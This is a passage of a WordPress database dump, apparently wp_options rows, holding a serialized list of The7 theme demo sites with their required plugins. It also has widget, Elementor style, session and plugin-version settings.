Business\";s:2:\"id\";s:15:\"modern-business\";s:10:\"screenshot\";s:54:\"//repo.the7.io/demo-content/assets/modern-business.jpg\";s:4:\"link\";s:32:\"https://the7.io/modern-business/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:9:\"revslider\";i:2;s:11:\"js_composer\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:16:\"minimal-creative\";a:10:{s:5:\"title\";s:16:\"Minimal Creative\";s:2:\"id\";s:16:\"minimal-creative\";s:10:\"screenshot\";s:55:\"//repo.the7.io/demo-content/assets/minimal-creative.jpg\";s:4:\"link\";s:33:\"https://the7.io/minimal-creative/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:9:\"revslider\";i:2;s:11:\"js_composer\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:4:\"weed\";a:10:{s:5:\"title\";s:4:\"Weed\";s:2:\"id\";s:4:\"weed\";s:10:\"screenshot\";s:43:\"//repo.the7.io/demo-content/assets/weed.jpg\";s:4:\"link\";s:21:\"https://the7.io/weed/\";s:16:\"required_plugins\";a:5:{i:0;s:12:\"dt-the7-core\";i:1;s:9:\"revslider\";i:2;s:11:\"js_composer\";i:3;s:18:\"Ultimate_VC_Addons\";i:4;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:10:\"g-creative\";a:10:{s:5:\"title\";s:18:\"Gutenberg Creative\";s:2:\"id\";s:10:\"g-creative\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/g-creative.jpg\";s:4:\"link\";s:27:\"https://the7.io/g-creative/\";s:16:\"required_plugins\";a:3:{i:0;s:14:\"contact-form-7\";i:1;s:12:\"dt-the7-core\";i:2;s:9:\"revslider\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"gutenberg\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:10:\"g-business\";a:10:{s:5:\"title\";s:18:\"Gutenberg Business\";s:2:\"id\";s:10:\"g-business\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/g-business.jpg\";s:4:\"link\";s:27:\"https://the7.io/g-business/\";s:16:\"required_plugins\";a:3:{i:0;s:14:\"contact-form-7\";i:1;s:12:\"dt-the7-core\";i:2;s:9:\"revslider\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"gutenberg\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:9:\"corporate\";a:10:{s:5:\"title\";s:9:\"Corporate\";s:2:\"id\";s:9:\"corporate\";s:10:\"screenshot\";s:48:\"//repo.the7.io/demo-content/assets/corporate.jpg\";s:4:\"link\";s:26:\"https://the7.io/corporate/\";s:16:\"required_plugins\";a:5:{i:0;s:14:\"contact-form-7\";i:1;s:12:\"dt-the7-core\";i:2;s:11:\"js_composer\";i:3;s:9:\"revslider\";i:4;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:6:\"agency\";a:10:{s:5:\"title\";s:6:\"Agency\";s:2:\"id\";s:6:\"agency\";s:10:\"screenshot\";s:45:\"//repo.the7.io/demo-content/assets/agency.jpg\";s:4:\"link\";s:23:\"https://the7.io/agency/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:16:\"software-company\";a:10:{s:5:\"title\";s:16:\"Software Company\";s:2:\"id\";s:16:\"software-company\";s:10:\"screenshot\";s:55:\"//repo.the7.io/demo-content/assets/software-company.jpg\";s:4:\"link\";s:33:\"https://the7.io/software-company/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:14:\"digital-agency\";a:10:{s:5:\"title\";s:17:\"Web Design Agency\";s:2:\"id\";s:14:\"digital-agency\";s:10:\"screenshot\";s:53:\"//repo.the7.io/demo-content/assets/digital-agency.jpg\";s:4:\"link\";s:31:\"https://the7.io/digital-agency/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:11:\"small-store\";a:10:{s:5:\"title\";s:11:\"Small Store\";s:2:\"id\";s:11:\"small-store\";s:10:\"screenshot\";s:50:\"//repo.the7.io/demo-content/assets/small-store.jpg\";s:4:\"link\";s:28:\"https://the7.io/small-store/\";s:16:\"required_plugins\";a:5:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";i:4;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:14:\"ecommerce-book\";a:10:{s:5:\"title\";s:10:\"Book Store\";s:2:\"id\";s:14:\"ecommerce-book\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/book-store.jpg\";s:4:\"link\";s:31:\"https://the7.io/ecommerce-book/\";s:16:\"required_plugins\";a:4:{i:0;s:11:\"js_composer\";i:1;s:9:\"revslider\";i:2;s:18:\"Ultimate_VC_Addons\";i:3;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:0;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:8:\"one-page\";a:10:{s:5:\"title\";s:15:\"Creative Agency\";s:2:\"id\";s:8:\"one-page\";s:10:\"screenshot\";s:47:\"//repo.the7.io/demo-content/assets/one-page.jpg\";s:4:\"link\";s:25:\"https://the7.io/one-page/\";s:16:\"required_plugins\";a:5:{i:0;s:12:\"dt-the7-core\";i:1;s:10:\"go_pricing\";i:2;s:11:\"js_composer\";i:3;s:9:\"revslider\";i:4;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:17:\"business-one-page\";a:10:{s:5:\"title\";s:25:\"Business One Page Website\";s:2:\"id\";s:17:\"business-one-page\";s:10:\"screenshot\";s:56:\"//repo.the7.io/demo-content/assets/business-one-page.jpg\";s:4:\"link\";s:34:\"https://the7.io/business-one-page/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:8:\"business\";a:10:{s:5:\"title\";s:8:\"Business\";s:2:\"id\";s:8:\"business\";s:10:\"screenshot\";s:47:\"//repo.the7.io/demo-content/assets/business.jpg\";s:4:\"link\";s:25:\"https://the7.io/business/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:0;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:4:\"shop\";a:10:{s:5:\"title\";s:4:\"Shop\";s:2:\"id\";s:4:\"shop\";s:10:\"screenshot\";s:43:\"//repo.the7.io/demo-content/assets/shop.jpg\";s:4:\"link\";s:21:\"https://the7.io/shop/\";s:16:\"required_plugins\";a:5:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";i:4;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:6:\"coffee\";a:10:{s:5:\"title\";s:6:\"Coffee\";s:2:\"id\";s:6:\"coffee\";s:10:\"screenshot\";s:45:\"//repo.the7.io/demo-content/assets/coffee.jpg\";s:4:\"link\";s:23:\"https://the7.io/coffee/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:16:\"marketing-agency\";a:10:{s:5:\"title\";s:16:\"Marketing Agency\";s:2:\"id\";s:16:\"marketing-agency\";s:10:\"screenshot\";s:55:\"//repo.the7.io/demo-content/assets/marketing-agency.jpg\";s:4:\"link\";s:33:\"https://the7.io/marketing-agency/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:12:\"construction\";a:10:{s:5:\"title\";s:12:\"Construction\";s:2:\"id\";s:12:\"construction\";s:10:\"screenshot\";s:51:\"//repo.the7.io/demo-content/assets/construction.jpg\";s:4:\"link\";s:29:\"https://the7.io/construction/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:10:\"restaurant\";a:10:{s:5:\"title\";s:10:\"Restaurant\";s:2:\"id\";s:10:\"restaurant\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/restaurant.jpg\";s:4:\"link\";s:27:\"https://the7.io/restaurant/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:7:\"medical\";a:10:{s:5:\"title\";s:7:\"Medical\";s:2:\"id\";s:7:\"medical\";s:10:\"screenshot\";s:46:\"//repo.the7.io/demo-content/assets/medical.jpg\";s:4:\"link\";s:24:\"https://the7.io/medical/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:0;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:4:\"news\";a:10:{s:5:\"title\";s:11:\"Blog & News\";s:2:\"id\";s:4:\"news\";s:10:\"screenshot\";s:43:\"//repo.the7.io/demo-content/assets/news.jpg\";s:4:\"link\";s:21:\"https://the7.io/news/\";s:16:\"required_plugins\";a:3:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:0;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:3:\"psy\";a:10:{s:5:\"title\";s:10:\"Psychology\";s:2:\"id\";s:3:\"psy\";s:10:\"screenshot\";s:42:\"//repo.the7.io/demo-content/assets/psy.jpg\";s:4:\"link\";s:20:\"https://the7.io/psy/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:0;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:5:\"photo\";a:10:{s:5:\"title\";s:11:\"Photography\";s:2:\"id\";s:5:\"photo\";s:10:\"screenshot\";s:44:\"//repo.the7.io/demo-content/assets/photo.jpg\";s:4:\"link\";s:22:\"https://the7.io/photo/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:10:\"go_pricing\";i:2;s:11:\"js_composer\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:7:\"product\";a:10:{s:5:\"title\";s:7:\"Product\";s:2:\"id\";s:7:\"product\";s:10:\"screenshot\";s:46:\"//repo.the7.io/demo-content/assets/product.jpg\";s:4:\"link\";s:24:\"https://the7.io/product/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:10:\"expedition\";a:10:{s:5:\"title\";s:10:\"Expedition\";s:2:\"id\";s:10:\"expedition\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/expedition.jpg\";s:4:\"link\";s:27:\"https://the7.io/expedition/\";s:16:\"required_plugins\";a:5:{i:0;s:14:\"contact-form-7\";i:1;s:12:\"dt-the7-core\";i:2;s:11:\"js_composer\";i:3;s:9:\"revslider\";i:4;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:3:\"law\";a:10:{s:5:\"title\";s:3:\"Law\";s:2:\"id\";s:3:\"law\";s:10:\"screenshot\";s:42:\"//repo.the7.io/demo-content/assets/law.jpg\";s:4:\"link\";s:20:\"https://the7.io/law/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:10:\"web-master\";a:10:{s:5:\"title\";s:10:\"Web Master\";s:2:\"id\";s:10:\"web-master\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/web-master.jpg\";s:4:\"link\";s:27:\"https://the7.io/web-master/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:14:\"coming-soon-02\";a:10:{s:5:\"title\";s:22:\"Coming Soon Revolution\";s:2:\"id\";s:14:\"coming-soon-02\";s:10:\"screenshot\";s:53:\"//repo.the7.io/demo-content/assets/coming-soon-02.jpg\";s:4:\"link\";s:31:\"https://the7.io/coming-soon-02/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:14:\"coming-soon-01\";a:10:{s:5:\"title\";s:19:\"Coming Soon Minimal\";s:2:\"id\";s:14:\"coming-soon-01\";s:10:\"screenshot\";s:53:\"//repo.the7.io/demo-content/assets/coming-soon-01.jpg\";s:4:\"link\";s:31:\"https://the7.io/coming-soon-01/\";s:16:\"required_plugins\";a:3:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:11:\"old-landing\";a:10:{s:5:\"title\";s:11:\"Old Landing\";s:2:\"id\";s:11:\"old-landing\";s:10:\"screenshot\";s:50:\"//repo.the7.io/demo-content/assets/old-landing.jpg\";s:4:\"link\";s:28:\"https://the7.io/old-landing/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:17:\"elementor-main-v9\";a:10:{s:5:\"title\";s:22:\"Elementor Main Classic\";s:2:\"id\";s:17:\"elementor-main-v9\";s:10:\"screenshot\";s:56:\"//repo.the7.io/demo-content/assets/elementor-main-v9.jpg\";s:4:\"link\";s:33:\"https://the7.io/elementor-main-v9\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:9:\"elementor\";i:2;s:12:\"pro-elements\";i:3;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:5:\"blank\";a:10:{s:5:\"title\";s:15:\"The Seven Blank\";s:2:\"id\";s:5:\"blank\";s:10:\"screenshot\";s:44:\"//repo.the7.io/demo-content/assets/blank.jpg\";s:4:\"link\";s:21:\"https://the7.io/blank\";s:16:\"required_plugins\";a:3:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:5:\"dance\";a:10:{s:5:\"title\";s:12:\"Dance School\";s:2:\"id\";s:5:\"dance\";s:10:\"screenshot\";s:44:\"//repo.the7.io/demo-content/assets/dance.jpg\";s:4:\"link\";s:22:\"https://the7.io/dance/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:0:{}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:10:\"conference\";a:10:{s:5:\"title\";s:10:\"Conference\";s:2:\"id\";s:10:\"conference\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/conference.jpg\";s:4:\"link\";s:27:\"https://the7.io/conference/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:0:{}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:0;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:12:\"event-agency\";a:10:{s:5:\"title\";s:12:\"Event Agency\";s:2:\"id\";s:12:\"event-agency\";s:10:\"screenshot\";s:51:\"//repo.the7.io/demo-content/assets/event-agency.jpg\";s:4:\"link\";s:29:\"https://the7.io/event-agency/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:0:{}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:8:\"creative\";a:10:{s:5:\"title\";s:14:\"Digital Agency\";s:2:\"id\";s:8:\"creative\";s:10:\"screenshot\";s:47:\"//repo.the7.io/demo-content/assets/creative.jpg\";s:4:\"link\";s:25:\"https://the7.io/creative/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:0:{}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:7:\"hosting\";a:10:{s:5:\"title\";s:7:\"Hosting\";s:2:\"id\";s:7:\"hosting\";s:10:\"screenshot\";s:46:\"//repo.the7.io/demo-content/assets/hosting.jpg\";s:4:\"link\";s:24:\"https://the7.io/hosting/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:0:{}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:0;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:3:\"app\";a:10:{s:5:\"title\";s:3:\"App\";s:2:\"id\";s:3:\"app\";s:10:\"screenshot\";s:42:\"//repo.the7.io/demo-content/assets/app.jpg\";s:4:\"link\";s:20:\"https://the7.io/app/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:0:{}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:17:\"personal-creative\";a:10:{s:5:\"title\";s:25:\"Personal Creative Website\";s:2:\"id\";s:17:\"personal-creative\";s:10:\"screenshot\";s:56:\"//repo.the7.io/demo-content/assets/personal-creative.jpg\";s:4:\"link\";s:34:\"https://the7.io/personal-creative/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:0:{}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:14:\"digital-artist\";a:10:{s:5:\"title\";s:14:\"Digital Artist\";s:2:\"id\";s:14:\"digital-artist\";s:10:\"screenshot\";s:53:\"//repo.the7.io/demo-content/assets/digital-artist.jpg\";s:4:\"link\";s:31:\"https://the7.io/digital-artist/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:0:{}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:2:\"cv\";a:10:{s:5:\"title\";s:2:\"CV\";s:2:\"id\";s:2:\"cv\";s:10:\"screenshot\";s:41:\"//repo.the7.io/demo-content/assets/cv.jpg\";s:4:\"link\";s:19:\"https://the7.io/cv/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:0:{}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}}','no'),
(461,'the7_demo_content_last_update','1665105279','no'),
(471,'_mphb_wp_session_expires_362120c17c4468722691a56e77f5942f','1664839662','no'),
(493,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),
(494,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),
(552,'elementor_scheme_color','a:4:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";}','yes'),
(553,'elementor_scheme_typography','a:4:{i:1;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"600\";}i:2;a:2:{s:11:\"font_family\";s:11:\"Roboto Slab\";s:11:\"font_weight\";s:3:\"400\";}i:3;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"400\";}i:4;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"500\";}}','yes'),
(554,'elementor_scheme_color-picker','a:8:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";i:5;s:7:\"#4054b2\";i:6;s:7:\"#23a455\";i:7;s:4:\"#000\";i:8;s:4:\"#fff\";}','yes'),
(656,'fm_key','gplKPjDISWbzf6q7BM1GrEinv','yes'),
(666,'filemanager_email_verified_1','yes','yes'),
(687,'vc_version','7.0','yes'),
(689,'wpb_js_composer_license_activation_notified','yes','yes'),
(699,'_mphb_wp_session_expires_2b6a5128f69378bc63a6d9a7c90803d1','1664841915','no'),
